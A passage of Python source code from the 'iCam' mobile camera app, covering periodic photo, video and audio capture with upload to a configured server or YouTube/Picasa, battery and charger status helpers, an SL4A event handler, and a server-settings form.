errorStr = "ContinuousVideoRecordAndUpload(%d) with " \
"videoFileName %s (free_ram = %d) returned " \
"exception %s. Bailing out..." % \
(cameraId, videoFileName, GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, errorStr,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(errorStr)
if MY_DEBUG_STDERR:
sys.stderr.write(" " + errorStr + "\n")
DebugPrintErrorTrace()
viewFinderSize = VIEWFINDER_SIZE_ORIG
"""
Even if we give return, finally is sill executed before
returning from this function.
"""
return
"""
# !!!!This finally doesn't work on PyS60 1.4.5 (Python 2.2) - WHY?
finally:
viewFinderSize = VIEWFINDER_SIZE_ORIG
"""
viewFinderSize = VIEWFINDER_SIZE_ORIG
# if accessPointName == u"":
# print "VideoRecordAndUpload(): Not uploading movie."
# return
def UploadThread(videoFileName, videoPathFileName):
"""
http://stackoverflow.com/questions/2576534/does-pythons-httplib-httpconnection-block
"Although you can do asynchronous requests, you will have to
make you entire program async-friendly. Async does not
magically make your code non-blocking. It would be much
easier to do the request in another thread or process if
you don't want to block your main loop."
"""
"""
We sleep to give time to the phone to complete saving the
video file.
It would be nice to use instead of sleep() a lock and signal
in VideoRecordCallback when it receives
camera.ERecordComplete, but ERecordComplete is not issued
by camera.stop_record().
"""
e32.ao_sleep(2)
"""
try:
camera.stop_finder()
DebugPrint("VideoRecordAndUpload(): after " \
"camera.stop_finder(), " \
"GetCurrentDateTimeStringWithMilliseconds() = %s." % \
GetCurrentDateTimeStringWithMilliseconds())
except:
DebugPrintErrorTrace()
sys.stdout.flush()
"""
UploadStateAndFileAndStoreState(deviceId, cameraId,
videoFileName, videoPathFileName,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
singleThreaded=True)
global MULTITHREADED_VIDEORECORD_AND_UPLOAD
if MULTITHREADED_VIDEORECORD_AND_UPLOAD:
"""
Multithreaded version --> it tries to film as much as possible,
with very little pause between films, since we use a
separate thread for video upload.
"""
"""
thread.start_new_thread(UploadThread, (videoFileName,
videoPathFileName))
"""
MyThreadStart(UploadThread, (videoFileName, videoPathFileName))
else:
# Single-threaded version.
res = UploadStateAndFileAndStoreState(deviceId, cameraId,
videoFileName, videoPathFileName,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
singleThreaded=True
)
if not MULTITHREADED_VIDEORECORD_AND_UPLOAD:
if storeLocallyMedia == 0:
DebugPrint("ContinuousVideoRecordAndUpload(): Since " \
"storeLocallyMedia == 0, I saved the movie on " \
"D: and now I erase it.")
try:
os.unlink(videoPathFileName)
except:
DebugPrintErrorTrace()
"""
When getting out of the Burst mode - which I should do, instead of
having a FOREVER loop.
"""
global videoRecordStartTime
videoRecordStartTime = -1
def AudioRecordAndUpload(recordDuration):
global LOCAL_FOLDER_MEDIA_FILES, accessPointName, deviceId
"""
!!!!TODO: use pyjnius example ex_audio_rec.py
from jnius import autoclass
from time import sleep
# get the needed Java class
MediaRecorder = autoclass('android.media.MediaRecorder')
AudioSource = autoclass('android.media.MediaRecorder$AudioSource')
OutputFormat = autoclass('android.media.MediaRecorder$OutputFormat')
AudioEncoder = autoclass('android.media.MediaRecorder$AudioEncoder')
# create out recorder
mRecorder = MediaRecorder()
mRecorder.setAudioSource(AudioSource.MIC)
mRecorder.setOutputFormat(OutputFormat.THREE_GPP)
mRecorder.setOutputFile('/sdcard/testrecorder.3gp')
#Alex: this was wrong
#mRecorder.setAudioEncoder(AudioEncoder.ARM_NB)
mRecorder.setAudioEncoder(AudioEncoder.ARM_NB)
mRecorder.prepare()
# record 5 seconds
mRecorder.start()
sleep(5)
mRecorder.stop()
mRecorder.release()
if ANDROID_OS:
recorderStartMicrophone
recorderStop
"""
# crtTime = GetCurrentDateTime()
"""
See http://pleac.sourceforge.net/pleac_python/datesandtimes.html and
http://docs.python.org/library/time.html#time.strftime for details.
"""
# audioFileName = time.strftime("%Y_%m_%d_%H_%M_%S.amr", crtTime)
audioFileName = GetCurrentDateTimeStringWithMilliseconds() + \
"_%s_%d.amr" % (deviceId, 2) # We make cameraId = 2
if storeLocallyMedia == 0:
# Since we don't want to store the file, we save in the RAM drive.
# audioPathFileName = "D:/iCamTemp.amr"
# Since we don't want to store the file, we save in the RAM drive.
audioPathFileName = LOCAL_FOLDER_TEMP + "/iCamTemp.amr"
else:
audioPathFileName = LOCAL_FOLDER_MEDIA_FILES + "/" + \
audioFileName
DebugPrint("AudioRecordAndUpload() with audioFileName = %s and " \
"recordDuration = %d. " % (audioFileName, recordDuration) + \
GetTextForState(0))
if SYMBIAN_OS:
try:
"""
Requires backslashes, otherwise audio.Sound.open() PROBABLY does
not create any file.
"""
audioPathFileNameWithBackslashes = \
audioPathFileName.replace("/", "\\")
mySound = audio.Sound.open(audioPathFileNameWithBackslashes)
mySound.record()
SleepAndPetWatchdog(recordDuration, False)
# e32.ao_sleep(recordDuration)
mySound.stop()
except:
(exceptionType, exceptionValue, exceptionTraceback)= sys.exc_info()
errorStr = "AudioRecordAndUpload() with audioFileName %s " \
"(free_ram = %d) returned exception %s. " \
"Bailing out..." % \
(audioFileName, GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, errorStr, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(errorStr)
if MY_DEBUG_STDERR:
sys.stderr.write(" " + errorStr + "\n")
DebugPrintErrorTrace()
return
# if accessPointName == u"":
# print "AudioRecordAndUpload(): Not uploading movie."
# sys.stdout.flush()
# return
res = UploadStateAndFileAndStoreState(
deviceId, 2, # We make cameraId = 2
audioFileName, audioPathFileName,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
singleThreaded=True
)
if storeLocallyMedia == 0:
DebugPrint("Since storeLocallyMedia == 0, I saved the audio file " \
"on D: and now I erase it.")
try:
"""
if SYMBIAN_OS:
if _PyS60_1_9_OR_NEWER: #pyS60VersionNumber > 14:
mediaUploadedLock.wait()
"""
os.unlink(audioPathFileName)
except:
DebugPrintErrorTrace()
def GetBatteryLevelPercentage():
try:
if ANDROID_OS:
"""
print "myDroid.batteryCheckPresent() =",
myDroid.batteryCheckPresent()
print "myDroid.batteryGetLevel() =", myDroid.batteryGetLevel()
print "myDroid.batteryGetHealth() =", myDroid.batteryGetHealth()
print "myDroid.batteryGetPlugType() =",
myDroid.batteryGetPlugType()
print "myDroid.batteryGetTechnology() =",
myDroid.batteryGetTechnology()
print "myDroid.batteryGetTemperature() =",
myDroid.batteryGetTemperature()
print "myDroid.batteryGetVoltage() =", myDroid.batteryGetVoltage()
print "myDroid.readBatteryData() =", myDroid.readBatteryData()
"""
#return 100 # int(myDroid.batteryGetLevel().result)
# See http://www.mithril.com.au/android/doc/BatteryManagerFacade.html
try:
DebugPrint(
"GetBatteryLevelPercentage(): %s" % \
str(myDroid.batteryGetLevel()))
"""
DebugPrint(
"GetBatteryLevelPercentage(): %d" % \
int(myDroid.batteryGetLevel().result))
"""
DebugPrint(
" %s" % \
str(myDroid.batteryCheckPresent()))
DebugPrint(
" %s" % \
str(myDroid.batteryGetHealth()))
DebugPrint(
" %s" % \
str(myDroid.batteryGetPlugType()))
DebugPrint(
" %s" % \
str(myDroid.batteryGetStatus()))
DebugPrint(
" %s" % \
str(myDroid.batteryGetTechnology()))
DebugPrint(
" %s" % \
str(myDroid.batteryGetTemperature()))
DebugPrint(
" %s" % \
str(myDroid.batteryGetVoltage()))
DebugPrint(
" %s" % \
str(myDroid.readBatteryData()))
except:
DebugPrintErrorTrace()
return 100
return 100
elif SYMBIAN_S60_OS:
# elif SYMBIAN_OS:
# S60 3rd+ edition
if S60_EDITION[0] >= 3:
return int(sysinfo.battery())
elif SYMBIAN_S60_2ND_ED:
"""
On S60 2nd edition the max is 7 bars - see
http://discussion.forum.nokia.com/forum/showthread.php?97900-Is-there-a-way-to-show-battery-level-in-a-scale-from-0-to-99-instead-7preset-values
"""
return int(sysinfo.battery() * 100.0 / 7.0)
elif SYMBIAN_UIQ_OS:
# else
return 100
elif iOS_PYOBJC:
return 100
elif WINDOWS_OS:
return 100
elif UNIX_OS:
return 100
elif WINDOWS_CE_OS_PYTHONCE:
return 100
elif RASPBIAN_OS:
return 100
except:
DebugPrintErrorTrace()
def GetChargerStatusStr():
global sysagentImported
if ANDROID_OS:
#print "myDroid.batteryGetStatus() =", myDroid.batteryGetStatus()
#return "[N/A]"
#return int(myDroid.batteryGetStatus().result)
return str(myDroid.batteryGetStatus())
elif SYMBIAN_S60_OS:
# elif SYMBIAN_OS:
if sysagentImported:
try:
res = int(sysagent.charger_status())
if res == -1:
return "error"
elif res == 0:
return "not connected"
elif res == 1:
return "charging"
elif res == 2:
return "not charging"
elif res == 3:
return "almost done"
elif res == 4:
return "charging done"
elif res == 5:
return "charging cont'd"
"""
EChargingStatusError = -1,
/// Charger not connected/uninitialized
EChargingStatusNotConnected = 0,
/// Device is charging
EChargingStatusCharging = 1,
/// Charger is connected, device not charging
EChargingStatusNotCharging = 2,
/// Charging almost completed
EChargingStatusAlmostComplete = 3,
/// Charging completed
EChargingStatusChargingComplete = 4,
/// Charging continued after brief interruption
EChargingStatusChargingContinued = 5
"""
except:
DebugPrintErrorTrace()
return "[N/A]"
else:
return "[N/A]"
elif SYMBIAN_UIQ_OS:
return "[N/A]"
elif iOS_PYOBJC:
return "[N/A]"
elif WINDOWS_OS:
return "[N/A]"
elif WINDOWS_CE_OS_PYTHONCE:
return "[N/A]"
def GetChargerStatus():
global deviceId, sysagentImported
if ANDROID_OS:
# print "myDroid.batteryGetStatus() =", myDroid.batteryGetStatus()
#return 1 # int(myDroid.batteryGetStatus().result)
try:
DebugPrint(
"GetChargerStatus(): %s" % \
str(myDroid.batteryGetStatus()))
"""
DebugPrint(
"GetChargerStatus(): %d" % \
int(myDroid.batteryGetStatus().result))
"""
except:
DebugPrintErrorTrace()
return 1
return 1
elif SYMBIAN_OS:
"""
# Nokia 6680
if deviceId == IMEI_6680:
return 1
"""
if sysagentImported:
try:
res = int(sysagent.charger_status())
"""
EChargingStatusError = -1,
/// Charger not connected/uninitialized
EChargingStatusNotConnected = 0,
/// Device is charging
EChargingStatusCharging = 1,
/// Charger is connected, device not charging
EChargingStatusNotCharging = 2,
/// Charging almost completed
EChargingStatusAlmostComplete = 3,
/// Charging completed
EChargingStatusChargingComplete = 4,
/// Charging continued after brief interruption
EChargingStatusChargingContinued = 5
"""
return res
except:
DebugPrintErrorTrace()
return 1
else:
return 1
elif iOS_PYOBJC:
return 1
elif WINDOWS_OS:
return 1
elif UNIX_OS:
return 1
elif WINDOWS_CE_OS_PYTHONCE:
return 1
elif RASPBIAN_OS:
return 1
def CallbackSMSSend(smsSendState):
try:
if smsSendState == messaging.ESent:
DebugPrint("CallbackSMSSend(smsSendState = %d): " \
"Message was sent." % smsSendState)
elif smsSendState == messaging.ESendFailed:
DebugPrint("CallbackSMSSend(smsSendState = %d): Something went " \
"wrong while sending." % smsSendState)
except:
DebugPrintErrorTrace()
# TODO!!!! Read it from state.bin
lastTimeSentMessage = 0
def CommunicateWithOperator():
global lastTimeSentMessage
DebugPrint("Entered CommunicateWithOperator().")
# MAX_TIME_BETWEEN_SEND_MESSAGES = 30 * 24 * 3600 # 30 days in seconds
MAX_TIME_BETWEEN_SEND_MESSAGES = 1 * 24 * 3600 # 1 day in seconds
try:
if GetTime() - lastTimeSentMessage > MAX_TIME_BETWEEN_SEND_MESSAGES:
DebugPrint("CommunicateWithOperator(): Sending SMS.")
# This returns only if the SMS was sent successfully - the
# application sometimes gets blocked at .sms_sens()
#messaging.sms_send("302", u"")
messaging.sms_send("302", u"", "7bit", CallbackSMSSend)
DebugPrint("Returned from messaging.sms_send().")
lastTimeSentMessage = GetCurrentDateTime()
except:
DebugPrint("CommunicateWithOperator(): returned an exception.")
DebugPrintErrorTrace()
# !!TODO - Maybe do separate Ops: MainCameraPhoto and MainCameraVideoRec
def MainCamera():
res = 0
# For the Main camera:
if cameraMode[0] != 0:
"""
if cameraMode[1] != 0:
pauseIntervalCurrent = int(pauseInterval / 2)
pauseIntervalLeft -= pauseIntervalCurrent
"""
if (cameraMode[0] == 2) or (cameraMode[0] == 3):
TakePhotoAndUpload(0)
res = 1
if (cameraMode[0] == 1) or (cameraMode[0] == 3):
if videoRecordDuration[0] > 0:
VideoRecordAndUpload(0,
videoRecordDuration[0])
res = 1
"""
if pauseIntervalCurrent != 0:
try:
SleepAndPetWatchdog(pauseIntervalCurrent,
True)
except:
DebugPrint("ReactiveLoop(): sleep " \
"returned an exception.")
DebugPrintErrorTrace()
"""
return res
# !!TODO - Maybe do separate Ops: VGACameraPhoto and VGACameraVideoRec
def VGACamera():
res = 0
# For the VGA camera:
if numCamerasSupported >= 2:
if cameraMode[1] != 0:
if (cameraMode[1] == 2) or (cameraMode[1] == 3):
TakePhotoAndUpload(1)
res = 1
if (cameraMode[1] == 1) or (cameraMode[1] == 3):
if videoRecordDuration[1] > 0:
VideoRecordAndUpload(1,
videoRecordDuration[1])
res = 1
return res
def Audio():
res = 0
if audioRecordDuration != 0:
AudioRecordAndUpload(audioRecordDuration)
res = 1
return res
"""
def Sleep():
try:
# e32.ao_sleep(pauseInterval)
SleepAndPetWatchdog(pauseInterval, True)
#!!!!TODO At every pet in SleepAndPetWatchdog we should increment a counter sleepState that is saved with StoreState() and in case iCam crashes and sleepState != -1 (??) we should resume the sleep.
# SleepAndPetWatchdog(pauseIntervalLeft, True)
except:
# time.sleep(pauseInterval)
DebugPrint("ReactiveLoop_real(): sleep returned an " \
"exception.")
DebugPrintErrorTrace()
"""
reactiveLoopOps = None
#if reactiveLoopOps is None:
reactiveLoopOps = [MainCamera, VGACamera, Audio]
#reactiveLoopOps = [MainCamera, VGACamera, Audio, Sleep]
# def StoreMediaAndUploadPeriodically():
def ReactiveLoop_real():
"""
global deviceId
global myTimer
global localPhotoResolution, localQualityIndex
global photoResolutionStr, photoModeStr, pauseIntervalStr, exposureStr
global whiteBalanceStr, flashStr, digitalZoom, photoResolutionIndex
global localPhotoResolutionIndex, photoModeIndex, photoQuality
global pauseInterval, exposureIndex, whiteBalanceIndex, flashIndex
global audioRecordDuration, videoRecordDuration, rotateDegreesImage
# GSM location info
global mobileCountryCode, mobileNetworkCode, locationAreaCode, cellId
global signalStrength, signalUnits, accessPointName, bluetoothMode
global gpsInfo, readGPS
global cameraPhotoSizes_JPEG_Exif, cameraPhotoSizes_RGB24
global myMaxRamdriveSize
"""
# global keyboard
# global myTimer
global pauseIntervalStr, pauseInterval, videoRecordDuration, \
audioRecordDuration, reactiveLoopIsStarted, burstModeIsStarted
global modeManagerIsEnabled
global readGPS
global startButtonPressed
global conserveEnergy
global reactiveLoopOpsIndex, reactiveLoopOps
DebugPrint("Entered ReactiveLoop_real().")
try:
if startButtonPressed == False:
startButtonPressed = True
if SYMBIAN_OS:
RedrawHandler(None)
if reactiveLoopIsStarted == False:
burstModeIsStarted = False
reactiveLoopIsStarted = True
# We call SetMenu() in order to remove the Start menu item.
SetMenu()
"""
I used after() instead of forever loop with ao_sleep() because I've
seen that probably because of the Internet connections to
RDS prepaid the forever loop with ao_sleep() was broken and the
application was no longer progress(??). That is why we use after(),
which invariably progresses (it seems).
But even the solution with after(), in conditions of stress - BT
server with (own and BT client) pauseInterval = 120 had issues
with no more progress.
"""
# if True:
while True:
if reactiveLoopIsStarted:
# EraseOldestMediaFiles()
DebugPrint("Entered ReactiveLoop_real() iteration.")
"""
hasDownloadedNewCmd = DownloadCommands()
# DownloadCommands() returns true if reads new commands.
if hasDownloadedNewCmd:
SetMenu()
StoreState()
try:
#myTimer.cancel()
#myTimer.after(pauseInterval, ReactiveLoop)
#LongAfter(myTimer, pauseInterval + 40 + \
# videoRecordDuration[0] + videoRecordDuration[1] + \
# audioRecordDuration, ReactiveLoop)
global sleepAndPetWatchdogTimer
LongAfter(sleepAndPetWatchdogTimer, pauseInterval,
ReactiveLoop)
except:
print "ReactiveLoop(): myTimer.after() returned an " \
"exception."
sys.stdout.flush()
traceback.print_exc()
sys.stderr.flush()
if pauseInterval == 0:
return
"""
if pauseInterval == 0:
#!!!!TODO: Test if this piece of code helps in case iCam crashes - it should.
if not burstModeIsStarted:
if (cameraMode[0] != 0) and (cameraMode[1] == 0):
# Burst mode photo
if cameraMode[0] == 2:
StartBurstMode()
else:
# Video rec
if videoRecordDuration[0] > 0:
ContinuousVideoRecordAndUpload(0,
videoRecordDuration[0])
elif (cameraMode[0] == 0) and (cameraMode[1] != 0):
# Burst mode photo.
if cameraMode[1] == 2:
StartBurstMode()
else:
# Video rec
if videoRecordDuration[1] > 0:
ContinuousVideoRecordAndUpload(1,
videoRecordDuration[1])
"""
#It appears that if I give e32.ao_sleep() it actually makes
# sleep the entire process, including the camera
# ViewFinder (so the camera ViewFinder does not get
# called very often).
try:
e32.ao_sleep(2) # [seconds]
except:
DebugPrint("ReactiveLoop(): ao_sleep() returned an " \
"exception.")
DebugPrintErrorTrace()
"""
reactiveLoopIsStarted = False
return
else:
hasDownloadedNewCmd = DownloadCommands()
"""
# DownloadCommands() returns true if reads new commands.
if hasDownloadedNewCmd:
SetMenu()
StoreState()
"""
"""
This is a tentative implementation of a "watchdog" directly
inside iCam as well.
Especially for Nokia 6680 I appreciate being less likely
for iCam to simply crash - but it can run out of memory.
"""
FREE_RAM_AMOUNT_THRESHOLD = 1 * MEGA_BYTE
if GetFreeRAM() < FREE_RAM_AMOUNT_THRESHOLD:
DebugPrint("ReactiveLoop_real(): Free RAM is %d - " \
"below %d. Restarting cellphone." % \
(GetFreeRAM(), FREE_RAM_AMOUNT_THRESHOLD))
RestartPhone()
"""
I do this here, because I want to resize the photos
received via BT with the latest resolution received
from DownloadCommands().
I should put the BluetoothMessageListProcess() before
calling DownloadCommands(), since I want to concentrate
all Internet access close, since
BluetoothMessageListProcess() takes a lot of time.
"""
if (bluetoothMode == 1) or (bluetoothMode == 2):
# This might take a long time to complete, if there are
# many BT messages in Inbox.
#BluetoothMessageListProcess(processJustNonSMF_BtMsgs=\
# False)
BluetoothMessageListProcess()
"""
Here we come back after a
SleepAndPetWatchdog(pauseIntervalGdata) -
which is good since normally we have immediately
after (see below) an UploadStateAndFileAndStoreState.
"""
"""
if modeManagerIsEnabled:
ModeManager()
PowerManager()
"""
# Even if we don't capture anything we still transmit the
# device's state (GPS if available, GSM, charghing
# status, free drive space, etc, etc)
if (cameraMode[0] == 0) and (cameraMode[1] == 0) and \
(audioRecordDuration == 0): # and readGPS):
UploadStateAndFileAndStoreState(deviceId, -1, #cameraId
NO_MEDIA_FILE_NAME, NO_MEDIA_FILE_NAME,
ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
"""
# We want to distribute the pauseInterval between the
# cameras, etc.
pauseIntervalCurrent = 0
pauseIntervalLeft = pauseInterval
"""
"""
In the loop below
while finishLoop == 0:
we iterate until we successfully complete an operation
(really take a photo, record a video or audio).
Note that we have an outer forever loop.
"""
finishLoop = 0
while finishLoop == 0:
DebugPrint("ReactiveLoop_real(): " \
"reactiveLoopOpsIndex=%d, " \
"reactiveLoopOps=%s." % \
(reactiveLoopOpsIndex, reactiveLoopOps))
if (reactiveLoopOpsIndex >= len(reactiveLoopOps)) or \
(reactiveLoopOpsIndex < 0):
reactiveLoopOpsIndex = 0
"""
We act a bit paranoid here, in the sense that we want
to ensure progress, even if the current operation
crashes in the middle or (best) at the very end.
Independent of what happens at the current operation
we proceed at the next one - we have experienced
a few times already when the operation was crashing
(main thread was not progressing) after we have
uploaded the media via Bluetooth to the iCam BT
server.
"""
prevReactiveLoopOpsIndex = reactiveLoopOpsIndex
# We update reactiveLoopOpsIndex.
reactiveLoopOpsIndex += 1
if reactiveLoopOpsIndex >= len(reactiveLoopOps):
reactiveLoopOpsIndex = 0
"""
We give StoreState() to quickly save the updated
reactiveLoopOpsIndex.
"""
StoreState()
"""
The operation (MainCamera, VGACamera, Audio) returns 1
if the operation did something concrete (take photo
or video recording) or 0 if, given the current iCam
settings, did not basically do anything.
"""
finishLoop = reactiveLoopOps[prevReactiveLoopOpsIndex]()
"""
# The straight/non-paranoid alternative:
reactiveLoopOps[reactiveLoopOpsIndex]()
# We update reactiveLoopOpsIndex.
reactiveLoopOpsIndex += 1
if reactiveLoopOpsIndex >= len(reactiveLoopOps):
reactiveLoopOpsIndex = 0
# We give StoreState() to quickly save the updated
# reactiveLoopOpsIndex.
StoreState()
"""
"""
In case more Unsent files are available because of
transmission errors.
"""
if (uploadUnsentData == 1) or (uploadUnsentData == 3):
UploadUnsentFILES()
try:
# e32.ao_sleep(pauseInterval)
SleepAndPetWatchdog(pauseInterval, True)
# SleepAndPetWatchdog(pauseIntervalLeft, True)
except:
# time.sleep(pauseInterval)
DebugPrint("ReactiveLoop_real(): sleep returned an " \
"exception.")
DebugPrintErrorTrace()
DebugPrint("Exiting ReactiveLoop_real().")
else:
#if reactiveLoopIsStarted == False:
# We should get here only on Android OS.
if ANDROID_OS:
"""
try:
time.sleep(10.0)
except:
DebugPrint("ReactiveLoop_real(): while " \
"reactiveLoopIsStarted=False, time.sleep() " \
"returned an exception.")
DebugPrintErrorTrace()
"""
DisplayNote("Waiting to start.")
SleepAndPetWatchdog(10.0, False)
elif SYMBIAN_OS:
return
except:
DebugPrintErrorTrace()
def ReactiveLoop():
ReactiveLoop_real()
#thread.start_new_thread(ReactiveLoop_real, ())
#MyThreadStart(ReactiveLoop_real)
def StopBroadcasting():
global reactiveLoopIsStarted
global startButtonPressed
if SYMBIAN_OS:
# Before and after camera.start_record(), videoRecordStartTime == -1 .
# if videoRecordTime != 0: #or (videoRecordStartTime == -1)
# Before and after camera.start_record(), videoRecordStartTime == -1 .
if videoRecordStartTime == -1: # or (videoRecordStartTime == -1)
reactiveLoopIsStarted = False
startButtonPressed = False
# We call SetMenu() in order to remove the Start menu item.
SetMenu()
#!!!!Why do we do this?
# Nokia E7 and N82.
if deviceId in [IMEI_E7, IMEI_N82]:
while True:
if reactiveLoopIsStarted:
break
SleepAndPetWatchdog(MAX_DURATION_BETWEEN_PETTING, False)
elif ANDROID_OS:
reactiveLoopIsStarted = False
startButtonPressed = False
def ReactiveLoopOnlyIfStartButtonNotAlreadyPressed():
global startButtonPressed
global reactiveLoopIsStarted
if ANDROID_OS:
"""
Normally, when we have startButtonPressed == True, we call
ReactiveLoop() in MainStartReactiveLoops(). I aggree that
startButtonPressed and reactiveLoopIsStarted are almost the same.
"""
if startButtonPressed:
#myDroid.makeToast("Pressed start.")
#time.sleep(2.0)
if reactiveLoopIsStarted:
DisplayNote("Already started.")
else:
DisplayNote("Restarting.")
# We have already given at least once Start and then a Stop.
reactiveLoopIsStarted = True
else:
DisplayNote("Starting.")
ReactiveLoop()
elif SYMBIAN_OS:
ReactiveLoop()
elif WINDOWS_CE_OS_PYTHONCE:
ReactiveLoop()
def ReactiveLoopStop():
global reactiveLoopIsStarted, startButtonPressed
reactiveLoopIsStarted = False
# startButtonPressed = False
if ANDROID_OS:
pass
# DisplayNote("Stopped.")
if ANDROID_OS:
myAllowReadEvents = True
def EventHandler():
global myAllowReadEvents
DebugPrint("Entered EventHandler().")
while True:
"""
try:
# Returns information about the currently active access point.
print "EventHandler(): myDroid.wifiGetConnectionInfo() =", \
myDroid.wifiGetConnectionInfo()
# Reassociates with the currently active access point.
# Returns: True if the operation succeeded.
#myDroid.wifiReassociate()
# Reconnects to the currently active access point.
# Returns: True if the operation succeeded.
myDroid.wifiReconnect()
except:
DebugPrintErrorTrace()
"""
# e = myDroid.receiveEvent()
"""
See related posts:
https://groups.google.com/group/android-scripting/msg/c9e805c4937f2d5e
https://groups.google.com/group/android-scripting/browse_thread/thread/ae658a62b2b60a30
"""
NEW_STYLE = False
try:
if myAllowReadEvents:
if NEW_STYLE == False:
e = myDroid.eventPoll(1)
elif NEW_STYLE == True:
"""
It seems that sometimes it consumes events that are
generated by the RPC system, which implies it
sabotages the communication between the Python
program and the SL4A Java library.
"""
e = myDroid.eventWait(10000)
# DisplayNote("read event!")
if e.result is None:
pass
else:
#DebugPrint("EventHandler(): e = %s" % str(e))
"""
#!!!!Check for events generated by cameraStartPreview:
EventHandler(): e = Result(id=169, result=[{u'data': {u'format': u'jpeg', u'encoding': u'file', u'height': 288, u'width': 352, u
'filename': u'/mnt/sdcard/external_sd/iCam/Media/prv-1287331584.jpg', u'quality': 80}, u'name': u'preview', u'time': 1377247976378000L}], error=None)
"""
"""
DebugPrint("EventHandler(): e.result['name'] = %s" % \
str(e.result["name"]))
DebugPrint("EventHandler(): " \
"optItems[e.result['name']] = %s" % \
str(optItems[str(e.result["name"])]))
DebugPrint("EventHandler(): e.result['data'] = %s" % \
str(e.result["data"]))
"""
#optItems[str(e.result["name"])]["event"](e.result["data"])
try:
# True and False are both bool and int
# - see http://www.peterbe.com/plog/bool-is-int.
if isinstance(e.result, bool):
DebugPrint(
"EventHandler(): isinstance(e.result) is " \
"bool")
#pass
elif isinstance(e.result, int):
DebugPrint(
"EventHandler(): isinstance(e.result) is " \
"int")
#pass
elif isinstance(e.result, list):
DebugPrint(
"EventHandler(): len(e.result) = %d" % \
len(e.result))
if len(e.result) == 1:
if NEW_STYLE == False:
myMap = e.result[0]
if NEW_STYLE == True:
myMap = e.result
# myMap = e.result
if isinstance(myMap, bool):
DebugPrint(
"EventHandler(): myMap is bool: %s" % \
str(myMap))
elif isinstance(myMap, int):
DebugPrint(
"EventHandler(): myMap is int: %s" % \
str(myMap))
elif (u"name" in myMap) and \
(u"data" in myMap) and \
(myMap[u"data"] is None):
DebugPrint("EventHandler(): e = %s" % \
str(e))
"""
IMPORTANT: Here we treat the events
related to the SL4A UI menu.
"""
# menuTable[str(myMap["name"])][1]()
"""
thread.start_new_thread(menuTable[
str(myMap["name"])][1], ())
"""
MyThreadStart( \
menuTable[str(myMap[u"name"])][1])
# (myMap[u"format"] == u"jpeg") and
elif (u"data" in myMap[u"data"]) and \
(myMap[u"data"] != None) and \
(u"format" in myMap[u"data"]):
"""
This is an event containing the frame info
data in Base64 from cameraStartPreview().
"""
frameData = myMap[u"data"][u"data"]
frameData = base64.b64decode(frameData)
#!!!!TODO: get right cameraId
cameraId = 0
photoFileName = \
GetCurrentDateTimeStringWithMilliseconds() + \
"_%s_%d_burst.jpg" % (deviceId, cameraId)
#"_%d.jpg" % cameraId
crtTime = GetCurrentDateTime()
crtTime2 = GetTime()
# See http://discussion.forum.nokia.com/forum/showthread.php?116978-What-is-the-time-granularity-in-Pys60 .
numMilliseconds = (crtTime2 - int(crtTime2)) * 1000
PicasaPhotoUpload(
pathFileName="/bogus/bogus.jpg",
fileName=photoFileName,
aKeyword=googleKeywords,
crtTime=crtTime,
mediaTimeStr=str(int(numMilliseconds)),
mediaDateStr="",
aDeviceId=deviceId,
cameraId=0,
aBatteryLevel=-1,
aChargerStatus=-1,
aData=frameData)
else:
DebugPrint("EventHandler(): e = %s" % \
str(e))
except:
DebugPrintErrorTrace()
# myDroid.creaMenu()
if NEW_STYLE == False:
time.sleep(2.0)
except:
# time.sleep(0.2)
DebugPrintErrorTrace()
# This var is required as a global.
serversFormSaved = False
def SelectServersMenu():
global serversFormSaved
global googleUsername, googlePassword, googleRememberPassword
global uploadMediaToYouTube, uploadMediaToPicasa, \
useiCamServer, googleMediaPrivate, googleKeywords #, btNetSearchKeywords
global ICAM_SERVER_NAME
DebugPrint("Entered SelectServersMenu().")
"""
From http://wiki.forum.nokia.com/index.php/How_to_use_Form_in_Python_for_S60
(and also http://www.mobilenin.com/pys60/info_tabs_forms.htm):
"""
if googleUsername is None:
googleUsername = ""
if googlePassword is None:
googlePassword = ""
# Create a list to be used in "combo" selection mode.
iCamComboList = [u"No", u"Yes, No Media", u"Yes, All"]
yesNoComboList = [u"No", u"Yes"]
noComboList = [u"No"]
infoComboList = [u"[Enter When Save Form]"]
"""
uploadMediaToYouTubeComboList = [u"No", u"Yes"]
uploadMediaToPicasaComboList = [u"No", u"Yes"]
googleRememberPasswordComboList = [u"No", u"Yes"]
"""
googleMediaPrivateComboList = [u"Public (shared to all)",
u"Private (shared only explicitely)"]
myFields = [
#0
#(u"Enter Google YouTube/Picasa login information", "text", u""),
(u"YouTube/Picasa username", "text", unicode(googleUsername)),
#1
# Enter On Save Form
#(u"YouTube/Picasa password", "text", u"[Enter When Save Form]"),
#unicode(GetGooglePassword())),
(u"YouTube/Picasa password", "combo", (infoComboList, 0)),
#2
(u"Remember password", "combo",
(yesNoComboList, googleRememberPassword)),
# Gives error: "ValueError: Form field, unknown type".
#(u"Password", "code", unicode(googlePassword)),
#3
(u"Upload to YouTube", "combo",
(yesNoComboList, uploadMediaToYouTube)),
#4
(u"Upload to Picasa", "combo",
(yesNoComboList, uploadMediaToPicasa)),
#5
# The iCam server is not for use for normal users ;)
#(u"Upload to iCam server", "combo",
# (yesNoComboList, useiCamServer)),
#(u"Upload media to iCam Server", "combo",
(u"Use the iCam Server", "combo",
(noComboList, useiCamServer)),
#6
(u"Media permissions on YouTube/Picasa", "combo",
(googleMediaPrivateComboList, googleMediaPrivate)),
#7
(u"YouTube video keywords", "text", unicode(googleKeywords)),
#8
(u"iCam Server address", "text", unicode(ICAM_SERVER_NAME))
#(u"Permissions of uploaded media on YouTube/Picasa:",
# "combo", (googleMediaPrivateComboList, 0))
#(u"Amount", "number", 5),
#(u"Date", "date"),
#(u"Time","time")
]
# Nokia E7 and 6120 and 6680 and N95 and N82
